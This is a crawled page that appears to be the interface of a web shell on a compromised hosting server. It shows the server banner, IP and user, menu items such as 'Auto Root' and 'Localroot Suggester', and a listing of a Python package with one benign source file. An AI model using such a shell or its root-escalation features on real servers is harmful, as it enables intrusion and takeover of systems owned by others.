Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python3.9 /
site-packages /
tuned /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
admin
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
daemon
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
exports
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
hardware
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
monitors
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
plugins
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
ppd
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
profiles
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
storage
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
units
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
utils
[ DIR ]
drwxr-xr-x
2026-02-27 05:56
__init__.py
953
B
-rw-r--r--
2025-08-24 21:48
consts.py
8.75
KB
-rw-r--r--
2025-09-21 10:11
exceptions.py
568
B
-rw-r--r--
2025-08-24 21:48
logs.py
3.75
KB
-rw-r--r--
2025-08-24 21:48
patterns.py
335
B
-rw-r--r--
2025-08-24 21:48
version.py
171
B
-rw-r--r--
2025-08-24 21:48
Save
Rename
import tuned.logs import sys import traceback exception_logger = tuned.logs.get() class TunedException(Exception): """ """ def log(self, logger = None): if logger is None: logger = exception_logger logger.error(str(self)) self._log_trace(logger) def _log_trace(self, logger): (exc_type, exc_value, exc_traceback) = sys.exc_info() if exc_value != self: logger.debug("stack trace is no longer available") else: exception_info = "".join(traceback.format_exception(exc_type, exc_value, exc_traceback)).rstrip() logger.debug(exception_info)